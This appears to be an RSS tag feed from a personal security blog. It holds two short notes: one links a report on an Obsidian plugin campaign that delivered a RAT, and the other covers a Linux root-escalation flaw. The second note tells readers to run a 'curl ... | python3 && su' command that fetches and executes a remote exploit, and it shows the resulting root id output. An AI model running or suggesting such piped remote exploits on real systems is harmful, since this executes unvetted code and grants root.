https://th0th.dev/tags/cybersecurity/Recent content in Cybersecurity on th0thHugoen-usMon, 11 May 2026 00:24:41 +0000https://th0th.dev/notes/obsidian_security/Mon, 11 May 2026 00:24:41 +0000https://th0th.dev/notes/obsidian_security/<p>Ref: <a href="https://cyber.netsecops.io/articles/obsidian-plugin-abused-in-campaign-to-deploy-phantom-pulse-rat/">Novel Campaign Abuses Obsidian Note-Taking App to Target Finance and Crypto Professionals with PHANTOMPULSE RAT</a></p> <p>Is your Obsidian vault safe? note taking and knowledge management encompass many disciplines. Technology accelerates the consumption and distribution of knowledge among others. That momentum comes with risks though. Ones who wish to do harm to others find any way to manipulate &amp; deceive for personal gain.</p> <p>The threat campaign linked above is just another example of the implicit trust that comes with the sharing of knowledge.</p>https://th0th.dev/notes/laptop/Mon, 04 May 2026 21:24:41 +0000https://th0th.dev/notes/laptop/<p><a href="https://www.youtube.com/watch?v=lkifbWtxxlk"> 732 bytes of Python just borked every Linux machine on earth…</a></p> <p>I ingest alot of news and articles each day but this video from Fireship just seemed like another nothing burger.. well I was wrong.</p> <p>I won&rsquo;t go into detail on the vulnerability but you can verify if your Linux based systems are vulnerable by running this PoC and reviwing the associated article for more context. <a href="https://copy.fail/">CopyFail</a>:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl https://copy.fail/exp | python3 <span style="color:#f92672">&amp;&amp;</span> su </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>$ id </span></span><span style="display:flex;"><span>uid<span style="color:#f92672">=</span>0<span style="color:#f92672">(</span>root<span style="color:#f92672">)</span> gid<span style="color:#f92672">=</span>1000<span style="color:#f92672">(</span>fr3d<span style="color:#f92672">)</span> groups<span style="color:#f92672">=</span>1000<span style="color:#f92672">(</span>fr3d<span style="color:#f92672">)</span>,24<span style="color:#f92672">(</span>cdrom<span style="color:#f92672">)</span>,25<span style="color:#f92672">(</span>floppy<span style="color:#f92672">)</span>,29<span style="color:#f92672">(</span>audio<span style="color:#f92672">)</span>,30<span style="color:#f92672">(</span>dip<span style="color:#f92672">)</span>,44<span style="color:#f92672">(</span>video<span style="color:#f92672">)</span>,46<span style="color:#f92672">(</span>plugdev<span style="color:#f92672">)</span>,100<span style="color:#f92672">(</span>users<span style="color:#f92672">)</span>,104<span style="color:#f92672">(</span>kvm<span style="color:#f92672">)</span>,106<span style="color:#f92672">(</span>netdev<span style="color:#f92672">)</span>,111<span style="color:#f92672">(</span>bluetooth<span style="color:#f92672">)</span>,113<span style="color:#f92672">(</span>lpadmin<span style="color:#f92672">)</span>,116<span style="color:#f92672">(</span>scanner<span style="color:#f92672">)</span>,126<span style="color:#f92672">(</span>libvirt<span style="color:#f92672">)</span>,995<span style="color:#f92672">(</span>docker<span style="color:#f92672">)</span> </span></span></code></pre></div>